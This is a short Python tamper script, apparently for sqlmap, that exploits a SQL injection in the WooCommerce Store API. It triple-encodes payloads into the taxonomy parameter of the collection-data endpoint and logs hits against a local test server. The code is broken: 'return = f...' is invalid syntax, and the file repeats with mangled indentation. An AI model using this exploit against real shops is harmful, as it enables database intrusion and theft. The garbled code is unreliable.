amalmurali47/woo.py

## woo.py
#!/usr/bin/env python3

from urllib.parse import quote as encode

import requests

base_url = 'http://localhost:9001'


def tamper(payload, **kwargs):
    encoded_payload = encode(encode(encode(payload)))
    check_sqli(encoded_payload)
    return encoded_payload


def generate_url(payload):
    return = f'{base_url}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]={payload}'


def save(url):
    with open('/tmp/payload_urls', 'a') as f:
        print(url, file=f)


def check_sqli(p):
    url = generate_url(p)
    r = requests.get(url).json()
    if r['attribute_counts']:
        save(url)
	#!/usr/bin/env python3

	from urllib.parse import quote as encode

	import requests

	base_url = 'http://localhost:9001'


	def tamper(payload, **kwargs):
	encoded_payload = encode(encode(encode(payload)))
	check_sqli(encoded_payload)
	return encoded_payload


	def generate_url(payload):
	return = f'{base_url}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]={payload}'


	def save(url):
	with open('/tmp/payload_urls', 'a') as f:
	print(url, file=f)


	def check_sqli(p):
	url = generate_url(p)
	r = requests.get(url).json()
	if r['attribute_counts']:
	save(url)